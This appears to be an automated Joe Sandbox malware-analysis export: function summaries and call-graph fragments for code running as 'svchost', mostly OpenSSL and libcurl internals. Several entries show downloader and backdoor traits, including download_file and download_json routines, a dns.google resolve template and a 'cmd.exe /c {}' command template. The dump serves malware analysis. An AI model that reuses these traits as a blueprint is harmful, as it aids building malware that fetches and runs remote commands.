7ffbab0118a5 81250->81252 81254 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81251->81254 81257 7ffbaafedcf0 81253->81257 81255 7ffbab0118c2 81254->81255 81259 7ffbaafedd20 81257->81259 81258 7ffbaafe5fe0 2 API calls 81258->81259 81259->81258 81260 7ffbaafedda6 81259->81260 81261 7ffbaafedd4b Sleep 81259->81261 81262 7ffbaafedd6a Sleep 81259->81262 81263 7ffbaafedd78 Sleep SleepEx 81259->81263 81260->81248 81261->81259 81262->81259 81263->81260 81270 7ffbab03a39c QueryPerformanceFrequency 81265->81270 81267 7ffbaafe5ff2 81271 7ffbab03a380 QueryPerformanceCounter 81267->81271 81269 7ffbaafe5ffa 81269->81249 81270->81267 81271->81269 81272 7ffbab42daa0 81273 7ffbab49edf0 81272->81273 81274 7ffbab42daae CRYPTO_zalloc 81273->81274 81275 7ffbab42dade CRYPTO_THREAD_lock_new 81274->81275 81276 7ffbab42dad6 81274->81276 81277 7ffbab42db2d CRYPTO_free 81275->81277 81278 7ffbab42db03 CRYPTO_new_ex_data 81275->81278 81280 7ffbab42db45 ERR_new ERR_set_debug ERR_set_error 81277->81280 81279 7ffbab42db20 CRYPTO_THREAD_lock_free 81278->81279 81283 7ffbab42dbe1 81278->81283 81279->81277 81281 7ffbab42db78 81280->81281 81282 7ffbab42dbc8 81280->81282 81281->81282 81284 7ffbab42db84 CRYPTO_free_ex_data 81281->81284 81285 7ffbab42dc3f OPENSSL_sk_dup 81283->81285 81286 7ffbab42db9b 81284->81286 81287 7ffbab42dca0 ERR_new ERR_set_debug ERR_set_error 81285->81287 81288 7ffbab42dcd3 81285->81288 81289 7ffbab42dbaa CRYPTO_THREAD_lock_free CRYPTO_free 81286->81289 81287->81281 81309 7ffbab41cb70 41 API calls 81288->81309 81289->81282 81291 7ffbab42dcdf 81291->81280 81291->81281 81292 7ffbab42dd73 X509_VERIFY_PARAM_new 81291->81292 81293 7ffbab42ddbc ERR_new ERR_set_debug ERR_set_error 81292->81293 81294 7ffbab42ddef X509_VERIFY_PARAM_inherit 81292->81294 81293->81281 81295 7ffbab42de03 81294->81295 81296 7ffbab42df09 81295->81296 81297 7ffbab42ded8 CRYPTO_memdup 81295->81297 81298 7ffbab42df57 81296->81298 81299 7ffbab42df23 CRYPTO_memdup 81296->81299 81297->81281 
81297->81296 81300 7ffbab42df75 CRYPTO_malloc 81298->81300 81302 7ffbab42dfca 81298->81302 81299->81281 81299->81298 81300->81281 81301 7ffbab42dfa6 memcpy 81300->81301 81301->81302 81302->81280 81303 7ffbab42e0c2 CRYPTO_memdup 81302->81303 81304 7ffbab42e0eb 81302->81304 81303->81280 81303->81304 81305 7ffbab42e105 CRYPTO_memdup 81304->81305 81306 7ffbab42e12e 81304->81306 81305->81280 81305->81306 81306->81280 81306->81282 81307 7ffbab42e182 ERR_new ERR_set_debug ERR_set_error 81306->81307 81308 7ffbab42e1b5 81306->81308 81307->81280 81308->81280 81308->81282 81309->81291 81310 7ffbaafe65f0 curl_easy_init 81311 7ffbaafe664a 81310->81311 81313 7ffbaafe6675 81310->81313 81312 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81311->81312 81330 7ffbaafe666d ctype 81312->81330 81315 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81313->81315 81314 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81316 7ffbaafe685e 81314->81316 81317 7ffbaafe66d7 81315->81317 81396 7ffbaafe8e40 81317->81396 81319 7ffbaafe6716 81321 7ffbaafe673e 81319->81321 81419 7ffbaafee1c0 81319->81419 81428 7ffbaafe72f0 81321->81428 81326 7ffbaafe6db7 curl_easy_cleanup 81328 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 81326->81328 81327 7ffbaafe5fe0 2 API calls 81329 7ffbaafe6776 81327->81329 81344 7ffbaafe680d 81328->81344 81331 7ffbaafedcf0 6 API calls 81329->81331 81330->81314 81334 7ffbaafe67cf curl_easy_cleanup curl_easy_init 81331->81334 81332 7ffbaafe6e1d 81333 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81332->81333 81335 7ffbaafe6e23 81333->81335 81336 7ffbaafe6881 81334->81336 81337 7ffbaafe67ed 81334->81337 81341 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81335->81341 81338 7ffbab03b118 std::_Throw_Cpp_error 104 API calls 81336->81338 81339 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81337->81339 81340 7ffbaafe689e 81338->81340 81339->81344 81342 7ffbaafe8e40 104 API calls 81340->81342 81343 7ffbaafe6e29 81341->81343 81345 

Control-flow Graph

Memory Dump Source
• Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
• Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
Similarity
• API ID: R_newR_set_debugR_set_error
• String ID: SSL_CTX_new_ex$ssl\ssl_lib.c
• API String ID: 1552677711-2988157636
• Opcode ID: e9777b34945a6ee12517b1d0900e39796eb2601d2fed10fadf22a14d78122077
• Instruction ID: 55151855714dcd1d97cb480d6770e669926a02b9b5ad4ce16a6ff9896d5aa7d2
• Opcode Fuzzy Hash: e9777b34945a6ee12517b1d0900e39796eb2601d2fed10fadf22a14d78122077
• Instruction Fuzzy Hash: 8CE15CA1A0FA8381FB62AB72D4923F92291EF44784F44C035DE6D466EAEE3CE5459311

Control-flow Graph

Memory Dump Source
• Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
• Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
Similarity
• API ID: Y_asn1_find_strY_asn1_get0_info$E_fetchH_fetchR_pop_to_markR_set_mark$D_get_sizeE_freeH_freeJ_nid2snR_fetch
• String ID: $ $ $ $DSA$ECDH$ECDSA$gost-mac$gost-mac-12$gost2001$gost2012_256$gost2012_512$kuznyechik-mac$magma-mac
• API String ID: 2321393641-365409564
• Opcode ID: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
• Instruction ID: 0c377516c2df7c095879a843b90ab41273efd517c93d83f1b95fa7e1ae88f128
• Opcode Fuzzy Hash: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
• Instruction Fuzzy Hash: 1CE1D2B2A06B9286F762CF30D481AB937E0FB44758F049139FE5D466A9EF39E484D700

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 193 (first block 7ffbab42daa0-7ffbab42dad4); edge list not reproduced. Named calls in the graph: CRYPTO_zalloc, CRYPTO_THREAD_lock_new, CRYPTO_THREAD_lock_free, CRYPTO_new_ex_data, CRYPTO_free_ex_data, CRYPTO_free, CRYPTO_malloc, CRYPTO_memdup, memcpy, OPENSSL_sk_dup, X509_VERIFY_PARAM_new, X509_VERIFY_PARAM_inherit, ERR_new, ERR_set_debug, ERR_set_error
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_lock_freeO_free$D_lock_newO_free_ex_dataO_new_ex_dataO_zallocR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_set_ct_validation_callback$ossl_ssl_connection_new_int$ssl\ssl_lib.c
                                                                                              • API String ID: 3044204582-3251968464
                                                                                              • Opcode ID: 78889371e09e9e759950568bd42c4b6e7c0cf0ede71c4b29a1cc3fa27e1db14d
                                                                                              • Instruction ID: a6fdd57f0e371abdb93943c47db7fa4f7bd8d32814e28f404dae0ab214e59ee3
                                                                                              • Opcode Fuzzy Hash: 78889371e09e9e759950568bd42c4b6e7c0cf0ede71c4b29a1cc3fa27e1db14d
                                                                                              • Instruction Fuzzy Hash: 0C1206B660AF8296EB9A9F35D5902AC73A4FB48B44F488139DF6C47365DF38E464C310

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 281 (first block 7ffbaafe72f0-7ffbaafe7337); edge list not reproduced. Named calls in the graph: curl_easy_setopt, curl_easy_perform, curl_easy_strerror, curl_easy_getinfo
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: curl_easy_setopt$curl_easy_getinfocurl_easy_performcurl_easy_strerror$_invalid_parameter_noinfo_noreturn
                                                                                              • String ID: "$File could not be created.$Response code: {} Content Type: {}$applicat$ion/octe$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$t-stream$text/plain; charset=utf-8
                                                                                              • API String ID: 4244892839-2565517602
                                                                                              • Opcode ID: 6634676893988e330a59b13b0f530b0e5d7fbb88ca349729e62b41c240678f05
                                                                                              • Instruction ID: 8f3b0ec62f5ce47fa572d5a7227f57a16e845646344ff12033d16106b1d22f68
                                                                                              • Opcode Fuzzy Hash: 6634676893988e330a59b13b0f530b0e5d7fbb88ca349729e62b41c240678f05
                                                                                              • Instruction Fuzzy Hash: 0422B1A2B09B81C6EB26CB35D4402BD77A0FB84B88F408636CE5D57B65DF39E585C350

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 395 (first block 7ffbaafe65f0-7ffbaafe6648); edge list not reproduced. Named calls in the graph: curl_easy_init, curl_easy_cleanup
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: curl_easy_init$curl_easy_cleanup
                                                                                              • String ID: CURL could not be initialized download_file$CURL could not be re-initialized download_file$CURL could not be re-initialized_2 download_file
                                                                                              • API String ID: 2458899574-242915743
                                                                                              • Opcode ID: edfc6142fef203dc8b3074d865694ce6d24d2c0a164ed5749f09d8e61e569a32
                                                                                              • Instruction ID: fbf4eff33c085cd0acf04cf792f8cb8aa0879f68d139c0e121266405aab5d97c
                                                                                              • Opcode Fuzzy Hash: edfc6142fef203dc8b3074d865694ce6d24d2c0a164ed5749f09d8e61e569a32
                                                                                              • Instruction Fuzzy Hash: 612222B2E1A78585EB658B34D8403BD6765EB857A8F108331EEAD46BD9EF3DD081C340

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 607 (first block 7ffbaafe6e60-7ffbaafe6e76); edge list not reproduced. Named calls in the graph: curl_easy_init, curl_easy_cleanup
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$curl_easy_cleanupcurl_easy_init
                                                                                              • String ID: CURL could not be initialized download_json$CURL could not be re-initialized download_json
                                                                                              • API String ID: 2934429083-2962405094
                                                                                              • Opcode ID: 590d92523ebcee6e3a7bbbfe03d2579010e41bb78fb3ece1522039a46dbd390c
                                                                                              • Instruction ID: a3d016fd28aee627f38e3d636874de92ef31947cf576e6f36a7eec959d334600
                                                                                              • Opcode Fuzzy Hash: 590d92523ebcee6e3a7bbbfe03d2579010e41bb78fb3ece1522039a46dbd390c
                                                                                              • Instruction Fuzzy Hash: 70C1D1B2A0A78185EB258B75D4403AD67A4FB84798F508235EEAC43BA5EF3DD591C300

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422F7F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422F97
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422FA8
                                                                                              • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422FE7
                                                                                              • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB423012
                                                                                              • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB42303B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_run_once$R_newR_set_debugR_set_error
                                                                                              • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                                                                                              • API String ID: 3879570137-538246785
                                                                                              • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                              • Instruction ID: 032c274a9e08a97b3be5d8040abe7bf14f3045d47c9d42eafb42ae478ca92204
                                                                                              • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                              • Instruction Fuzzy Hash: DF313EE1B1A20386FB969735E8917B933A1EF94380F889035ED2E472B5DE2CE945D640

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 888 (first block 7ffbab067ffc-7ffbab06806d); edge list not reproduced. Named calls in the graph: CreateFileW, GetFileType, GetLastError, CloseHandle
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                              • String ID:
                                                                                              • API String ID: 1617910340-0
                                                                                              • Opcode ID: 8437788e23e207c34b3612ebda8bd24e9ae57695d1c9820b1b9e8f409681dfe0
                                                                                              • Instruction ID: 3c3aac78025407057dd3bdf205f7edca087afe942e91c3a745b55b6a7f8949f0
                                                                                              • Opcode Fuzzy Hash: 8437788e23e207c34b3612ebda8bd24e9ae57695d1c9820b1b9e8f409681dfe0
                                                                                              • Instruction Fuzzy Hash: 25C1C373B25B4185EB21CF78C4902AD3B65FB49B98F11822ADE2E573A4DF78E461C340

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB05677D
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB05678F
                                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB0567D1
                                                                                              • VirtualProtect.KERNEL32 ref: 00007FFBAB05682D
                                                                                              • VirtualProtect.KERNEL32 ref: 00007FFBAB05685E
                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB0568A2
                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB0568AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                              • API String ID: 740688525-1880043860
                                                                                              • Opcode ID: ab76589d6c54d6a326f523da88ed150cb661493434ef03a6b2d42ed5dbc1533e
                                                                                              • Instruction ID: 650b576496bfc516ef3dc0deca0626b52e751d5f796ffc86fe9f5a6911828912
                                                                                              • Opcode Fuzzy Hash: ab76589d6c54d6a326f523da88ed150cb661493434ef03a6b2d42ed5dbc1533e
                                                                                              • Instruction Fuzzy Hash: AC51A2A1B0AB4681EA769B76E4109B96354BF48BB0F48C735DE3D47BE4DF3CE4658200

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$curl_global_init
                                                                                              • String ID: "$Answer$data$https://dns.google/resolve?name={}
                                                                                              • API String ID: 3819036960-82038468
                                                                                              • Opcode ID: 59bb28103cee1aee3c5fad7c54ddbac10d2075a140da29ac5d0c9250a1f0ef03
                                                                                              • Instruction ID: ac7e979f8a7e9e70570249a66f86837a5ec24a140cc496a9bb706a6e2c09d056
                                                                                              • Opcode Fuzzy Hash: 59bb28103cee1aee3c5fad7c54ddbac10d2075a140da29ac5d0c9250a1f0ef03
                                                                                              • Instruction Fuzzy Hash: EFC115A2E0E7C681EA369B34E4403BA6351FB86794F108232DE9D436E9DF7DD082C750

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: curl_easy_setopt$_invalid_parameter_noinfo_noreturncurl_easy_performcurl_easy_strerror
                                                                                              • String ID:
                                                                                              • API String ID: 496898497-0
                                                                                              • Opcode ID: dbe63b870c19d87e2bb359bceb4f8389c0c2a63cf7250fc1c60ffc9ca98cd2ef
                                                                                              • Instruction ID: 5cb87b2bf76d9226ca00cf503bb8d1c2c509487536a6c5ab20f13e916aa7e77b
                                                                                              • Opcode Fuzzy Hash: dbe63b870c19d87e2bb359bceb4f8389c0c2a63cf7250fc1c60ffc9ca98cd2ef
                                                                                              • Instruction Fuzzy Hash: 1F71E3A2F09A85C2EB258B35E44437DA361FB85BD4F108231DEAD47BA5DF7DE4828740

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreateObjectProcessSingleWait_invalid_parameter_noinfo_noreturn
                                                                                              • String ID: cmd.exe /c {}
                                                                                              • API String ID: 3882512363-3162138867
                                                                                              • Opcode ID: d137653e5bb499d1f3ac429a0c12489c16ab699fb9fefba6721ffb36d19b4ffd
                                                                                              • Instruction ID: 740f8d3f2f06782dfd5b1ab90b915cd0c08fe53d96b47e56fca752eb52a6a75b
                                                                                              • Opcode Fuzzy Hash: d137653e5bb499d1f3ac429a0c12489c16ab699fb9fefba6721ffb36d19b4ffd
                                                                                              • Instruction Fuzzy Hash: 3161C372E19B8586E7158F74E8403ADB3B4FB94758F108236EEAC13A68DF78D095C740

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 80580447bdf006c8bb099900400e9773724f3534977f34bb1017d48ee99cfaed
                                                                                              • Instruction ID: f8cb8a599dec6ef7621eab16ad795cde76102dccf9107c4320deb0099704ca43
                                                                                              • Opcode Fuzzy Hash: 80580447bdf006c8bb099900400e9773724f3534977f34bb1017d48ee99cfaed
                                                                                              • Instruction Fuzzy Hash: BBC1C2A290E78681E7729F25D440ABE6795EB80B80F55C336DE6D03BB1CE7CE8758300

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                              • String ID:
                                                                                              • API String ID: 3053331623-0
                                                                                              • Opcode ID: 82f975a65af9a806176bc470929628a152f3e5129f63775cb722e992c27d5d3d
                                                                                              • Instruction ID: b01f35152e1bb75139c02283c75ccb799041d5cb3fc28ca4d5bc75f9fe8ac25f
                                                                                              • Opcode Fuzzy Hash: 82f975a65af9a806176bc470929628a152f3e5129f63775cb722e992c27d5d3d
